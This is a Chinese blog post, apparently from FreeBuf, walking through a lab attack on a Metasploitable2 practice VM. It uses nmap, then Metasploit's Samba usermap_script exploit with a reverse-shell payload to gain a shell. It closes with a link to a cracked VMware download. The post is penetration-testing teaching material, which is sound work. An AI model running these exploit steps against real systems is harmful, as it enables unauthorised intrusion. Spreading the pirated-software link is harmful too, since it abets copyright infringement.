freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Note1:搭建靶机,利用samba服务漏洞获取主机shell
2020-07-30 13:40:47

本次靶机的运行系统是metasploitable2, 它是一个特制的ubuntu操作系统,主要用于安全工具测试和演示常见的漏洞攻击。

1.信息收集

利用nmap扫描并查看系统开放端口和相应的的应用程序,命令为nmap -sV 靶机地址,其中s是scan,V是version。

2.漏洞发现

查看445端口和139端口中运行着samba3.X-4.X的服务,samba是一款基于SMB(server message block)协议的免费软件,SMB用于在局域网内共享打印机和文件。

3.漏洞利用

打开Metasploit工具,在msf下输入search samba,查找可利用的漏洞模块。

选择exploit/multi/samba/usermap_script,因为它被标记为excellent,输入use exploit/multi/samba/usermap_script,利用该模块,使用show payloads命令查看该模块下的payload。

因为目标机是linux机,所以选择linux的载荷,这里选择基础的cmd/unix/reverse反向攻击载荷模块,选择命令set payload cmd/unix/reverse。

设置靶机地址:set RHOST 靶机地址

设置漏洞端口:set RPORT 445

设置攻击机地址:set LHOST 攻击机地址

使用 show options命令查看配置是否正确。

输入exploit或run命令进行攻击,成功获取目标的主机的shell。

4.总结

以上以linux系统渗透为例,windows系统的渗透过程其实也差不多,只不过可能利用的漏洞模块和载荷的组合方式可能不一样。防御方法:将samba服务升级到最新版本,即可防御该漏洞。

5.相关链接

metasploitable2

下载地址:

https://sourceforge.net/projects/metasploitable/ 

vmware(包含破解机)

下载地址:

链接:https://pan.baidu.com/s/1OXceW1jyvxFuky_preQ72w

提取码:mqyk

                      

 

 

 

 

 

 

# web安全 # Metasploit
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者